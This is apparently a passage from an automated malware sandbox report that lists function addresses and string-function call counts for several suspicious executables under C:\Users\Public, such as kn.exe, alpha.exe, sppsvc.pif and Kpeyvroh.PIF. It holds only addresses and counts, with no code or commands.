Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE89D6C 25_2_00007FF67DE89D6C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF3DD84 25_2_00007FF67DF3DD84
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9C0B8 25_2_00007FF67DE9C0B8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF02084 25_2_00007FF67DF02084
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE68080 25_2_00007FF67DE68080
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE98018 25_2_00007FF67DE98018
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE9FF8 25_2_00007FF67DEE9FF8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE31F80 25_2_00007FF67DE31F80
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFBB28 25_2_00007FF67DEFBB28
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE97AC8 25_2_00007FF67DE97AC8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE47AB4 25_2_00007FF67DE47AB4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE9A58 25_2_00007FF67DEE9A58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE81A60 25_2_00007FF67DE81A60
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEABA48 25_2_00007FF67DEABA48
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE63A40 25_2_00007FF67DE63A40
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE31A10 25_2_00007FF67DE31A10
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF3FC90 25_2_00007FF67DF3FC90
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5F9B8 25_2_00007FF67DE5F9B8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB19AC 25_2_00007FF67DEB19AC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBF990 25_2_00007FF67DEBF990
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF27938 25_2_00007FF67DF27938
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF2994C 25_2_00007FF67DF2994C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6DD20 25_2_00007FF67DE6DD20
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE45D08 25_2_00007FF67DE45D08
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE8BCE8 25_2_00007FF67DE8BCE8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE69CD0 25_2_00007FF67DE69CD0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF9CC0 25_2_00007FF67DEF9CC0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE4BCA4 25_2_00007FF67DE4BCA4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB1C90 25_2_00007FF67DEB1C90
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE83C60 25_2_00007FF67DE83C60
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE8FC34 25_2_00007FF67DE8FC34
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6FC20 25_2_00007FF67DE6FC20
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE3C10 25_2_00007FF67DEE3C10
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9DBF0 25_2_00007FF67DE9DBF0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE59BC8 25_2_00007FF67DE59BC8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE35BA4 25_2_00007FF67DE35BA4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA1B84 25_2_00007FF67DEA1B84
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE3FB84 25_2_00007FF67DE3FB84
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC7B74 25_2_00007FF67DEC7B74
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEDFB50 25_2_00007FF67DEDFB50
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBF6D8 25_2_00007FF67DEBF6D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE876B0 25_2_00007FF67DE876B0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEED6A0 25_2_00007FF67DEED6A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE7678 25_2_00007FF67DEE7678
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF05660 25_2_00007FF67DF05660
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5D660 25_2_00007FF67DE5D660
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE75648 25_2_00007FF67DE75648
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE3F610 25_2_00007FF67DE3F610
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB95FC 25_2_00007FF67DEB95FC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE955F0 25_2_00007FF67DE955F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6B58C 25_2_00007FF67DE6B58C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6156C 25_2_00007FF67DE6156C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF09580 25_2_00007FF67DF09580
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE858CC 25_2_00007FF67DE858CC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE97890 25_2_00007FF67DE97890
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF03874 25_2_00007FF67DF03874
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DECD858 25_2_00007FF67DECD858
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC184C 25_2_00007FF67DEC184C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF13638 25_2_00007FF67DF13638
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE51830 25_2_00007FF67DE51830
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE3820 25_2_00007FF67DEE3820
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE4F800 25_2_00007FF67DE4F800
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF17678 25_2_00007FF67DF17678
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9D7F0 25_2_00007FF67DE9D7F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE717D4 25_2_00007FF67DE717D4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA77C8 25_2_00007FF67DEA77C8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE89790 25_2_00007FF67DE89790
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE4B788 25_2_00007FF67DE4B788
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0D6DC 25_2_00007FF67DF0D6DC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB3760 25_2_00007FF67DEB3760
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC5318 25_2_00007FF67DEC5318
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA92D8 25_2_00007FF67DEA92D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE8D2C0 25_2_00007FF67DE8D2C0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF1B3AC 25_2_00007FF67DF1B3AC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE992C4 25_2_00007FF67DE992C4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE3F2C0 25_2_00007FF67DE3F2C0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF233D0 25_2_00007FF67DF233D0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF333D4 25_2_00007FF67DF333D4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE5290 25_2_00007FF67DEE5290
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE831E0 25_2_00007FF67DE831E0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE811C8 25_2_00007FF67DE811C8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF294A8 25_2_00007FF67DF294A8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE4D1B8 25_2_00007FF67DE4D1B8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBF168 25_2_00007FF67DEBF168
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEAF520 25_2_00007FF67DEAF520
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF014F0 25_2_00007FF67DF014F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE554A0 25_2_00007FF67DE554A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE9494 25_2_00007FF67DEE9494
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE97478 25_2_00007FF67DE97478
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEDD460 25_2_00007FF67DEDD460
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE35438 25_2_00007FF67DE35438
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE7D440 25_2_00007FF67DE7D440
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE7F434 25_2_00007FF67DE7F434
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEAD410 25_2_00007FF67DEAD410
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE373F8 25_2_00007FF67DE373F8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0D2B4 25_2_00007FF67DF0D2B4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5B36C 25_2_00007FF67DE5B36C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE67340 25_2_00007FF67DE67340
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE58F1C 25_2_00007FF67DE58F1C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE36EF4 25_2_00007FF67DE36EF4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6EED4 25_2_00007FF67DE6EED4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5EDA4 25_2_00007FF67DE5EDA4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA6D7C 25_2_00007FF67DEA6D7C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF511C 25_2_00007FF67DEF511C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF12D6C 25_2_00007FF67DF12D6C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE4B09C 25_2_00007FF67DE4B09C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE8D094 25_2_00007FF67DE8D094
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE7107C 25_2_00007FF67DE7107C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE31030 25_2_00007FF67DE31030
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF14E58 25_2_00007FF67DF14E58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF18EAC 25_2_00007FF67DF18EAC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED4F94 25_2_00007FF67DED4F94
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE64F90 25_2_00007FF67DE64F90
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE84B30 25_2_00007FF67DE84B30
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB6A84 25_2_00007FF67DEB6A84
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBEA7C 25_2_00007FF67DEBEA7C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF04A40 25_2_00007FF67DF04A40
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF08C58 25_2_00007FF67DF08C58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBAA00 25_2_00007FF67DEBAA00
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9E9F0 25_2_00007FF67DE9E9F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE909EC 25_2_00007FF67DE909EC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF3CC8C 25_2_00007FF67DF3CC8C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE88990 25_2_00007FF67DE88990
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE96984 25_2_00007FF67DE96984
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF28CF4 25_2_00007FF67DF28CF4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE32940 25_2_00007FF67DE32940
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE88D2C 25_2_00007FF67DE88D2C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE92D18 25_2_00007FF67DE92D18
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE8CD10 25_2_00007FF67DE8CD10
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC2CF8 25_2_00007FF67DEC2CF8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE48D00 25_2_00007FF67DE48D00
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DECCCA8 25_2_00007FF67DECCCA8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEACC80 25_2_00007FF67DEACC80
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0A9F0 25_2_00007FF67DF0A9F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE80C28 25_2_00007FF67DE80C28
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE3AC08 25_2_00007FF67DE3AC08
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF24A58 25_2_00007FF67DF24A58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF1AA58 25_2_00007FF67DF1AA58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE7CBFC 25_2_00007FF67DE7CBFC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA8BD4 25_2_00007FF67DEA8BD4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE6B94 25_2_00007FF67DEE6B94
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE54B68 25_2_00007FF67DE54B68
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF26750 25_2_00007FF67DF26750
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEAC6F8 25_2_00007FF67DEAC6F8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9C6D0 25_2_00007FF67DE9C6D0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE98630 25_2_00007FF67DE98630
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFC630 25_2_00007FF67DEFC630
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF22854 25_2_00007FF67DF22854
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE405E0 25_2_00007FF67DE405E0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF148C4 25_2_00007FF67DF148C4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF108C8 25_2_00007FF67DF108C8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DECE57C 25_2_00007FF67DECE57C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE82580 25_2_00007FF67DE82580
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE68570 25_2_00007FF67DE68570
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9655C 25_2_00007FF67DE9655C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF04538 25_2_00007FF67DF04538
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF285A8 25_2_00007FF67DF285A8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF385EC 25_2_00007FF67DF385EC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBE844 25_2_00007FF67DEBE844
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBC7F0 25_2_00007FF67DEBC7F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB27D0 25_2_00007FF67DEB27D0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE07D0 25_2_00007FF67DEE07D0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF1234C 25_2_00007FF67DF1234C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE8E29C 25_2_00007FF67DE8E29C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5227C 25_2_00007FF67DE5227C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA6280 25_2_00007FF67DEA6280
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF1E430 25_2_00007FF67DF1E430
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF4842F 25_2_00007FF67DF4842F
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF821C 25_2_00007FF67DEF821C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBA1E8 25_2_00007FF67DEBA1E8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF10490 25_2_00007FF67DF10490
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE8C1D0 25_2_00007FF67DE8C1D0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF184D8 25_2_00007FF67DF184D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE38170 25_2_00007FF67DE38170
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE50140 25_2_00007FF67DE50140
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE3C520 25_2_00007FF67DE3C520
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBE4F0 25_2_00007FF67DEBE4F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE444E0 25_2_00007FF67DE444E0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA24D4 25_2_00007FF67DEA24D4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE764A8 25_2_00007FF67DE764A8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC8488 25_2_00007FF67DEC8488
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE88484 25_2_00007FF67DE88484
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF441F8 25_2_00007FF67DF441F8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEAA450 25_2_00007FF67DEAA450
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEAC450 25_2_00007FF67DEAC450
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE3A424 25_2_00007FF67DE3A424
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB8414 25_2_00007FF67DEB8414
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE54410 25_2_00007FF67DE54410
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF14274 25_2_00007FF67DF14274
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC43D0 25_2_00007FF67DEC43D0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE90398 25_2_00007FF67DE90398
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE7E3A0 25_2_00007FF67DE7E3A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC6374 25_2_00007FF67DEC6374
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028B8359 28_2_028B8359
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028920C4 28_2_028920C4
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA0DB62 28_2_1BA0DB62
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA4332B 28_2_1BA4332B
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA2E2FB 28_2_1BA2E2FB
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA361F0 28_2_1BA361F0
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA23946 28_2_1BA23946
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA278FE 28_2_1BA278FE
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA2E0CC 28_2_1BA2E0CC
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA26FEA 28_2_1BA26FEA
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA28762 28_2_1BA28762
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA2DE9D 28_2_1BA2DE9D
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA25E5E 28_2_1BA25E5E
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA2E558 28_2_1BA2E558
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA274E6 28_2_1BA274E6
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BCAA54 29_2_00007FF789BCAA54
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC8DF8 29_2_00007FF789BC8DF8
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD5554 29_2_00007FF789BD5554
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD7854 29_2_00007FF789BD7854
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD37D8 29_2_00007FF789BD37D8
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC3410 29_2_00007FF789BC3410
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC6EE4 29_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BE7F00 29_2_00007FF789BE7F00
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD0A6C 29_2_00007FF789BD0A6C
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BCE680 29_2_00007FF789BCE680
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BEEE88 29_2_00007FF789BEEE88
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD4224 29_2_00007FF789BD4224
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC2220 29_2_00007FF789BC2220
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC4A30 29_2_00007FF789BC4A30
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BEAA30 29_2_00007FF789BEAA30
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC5240 29_2_00007FF789BC5240
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC7650 29_2_00007FF789BC7650
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BCD250 29_2_00007FF789BCD250
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC9E50 29_2_00007FF789BC9E50
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BCCE10 29_2_00007FF789BCCE10
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC81D4 29_2_00007FF789BC81D4
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BED9D0 29_2_00007FF789BED9D0
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC7D30 29_2_00007FF789BC7D30
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BF1538 29_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BCB0D8 29_2_00007FF789BCB0D8
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC8510 29_2_00007FF789BC8510
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD18D4 29_2_00007FF789BD18D4
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC1884 29_2_00007FF789BC1884
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC2C48 29_2_00007FF789BC2C48
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BEAC4C 29_2_00007FF789BEAC4C
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC6BE0 29_2_00007FF789BC6BE0
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BEAFBC 29_2_00007FF789BEAFBC
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC5B70 29_2_00007FF789BC5B70
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC3F90 29_2_00007FF789BC3F90
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC372C 29_2_00007FF789BC372C
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC9B50 29_2_00007FF789BC9B50
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029A20C4 36_2_029A20C4
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210B4159 36_2_210B4159
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21098168 36_2_21098168
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210A61F0 36_2_210A61F0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2109E0CC 36_2_2109E0CC
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2107F0FA 36_2_2107F0FA
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210B332B 36_2_210B332B
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2108739D 36_2_2108739D
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2109E2FB 36_2_2109E2FB
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2109E558 36_2_2109E558
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210974E6 36_2_210974E6
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21098770 36_2_21098770
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21093946 36_2_21093946
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210AD9C9 36_2_210AD9C9
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210978FE 36_2_210978FE
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2107DB62 36_2_2107DB62
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21087BAF 36_2_21087BAF
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21087A46 36_2_21087A46
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21097D33 36_2_21097D33
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21073FCA 36_2_21073FCA
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21096FEA 36_2_21096FEA
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21086E0E 36_2_21086E0E
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21095E5E 36_2_21095E5E
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2109DE9D 36_2_2109DE9D
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: String function: 029A4668 appears 244 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: String function: 029A6604 appears 32 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: String function: 21062093 appears 50 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: String function: 029A4470 appears 67 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: String function: 029A47D0 appears 771 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: String function: 21094770 appears 41 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: String function: 029B7B60 appears 45 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: String function: 21061E65 appears 34 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: String function: 21094E10 appears 54 times
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: String function: 028947D0 appears 522 times
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: String function: 02896604 appears 33 times
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: String function: 02894668 appears 154 times
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: String function: 1BA24E10 appears 54 times
Source: C:\Users\Public\alpha.exe Code function: String function: 00007FF789BD3448 appears 54 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67DEEABFC appears 818 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67DEF0D10 appears 181 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67DF464A6 appears 173 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67DECEB98 appears 93 times
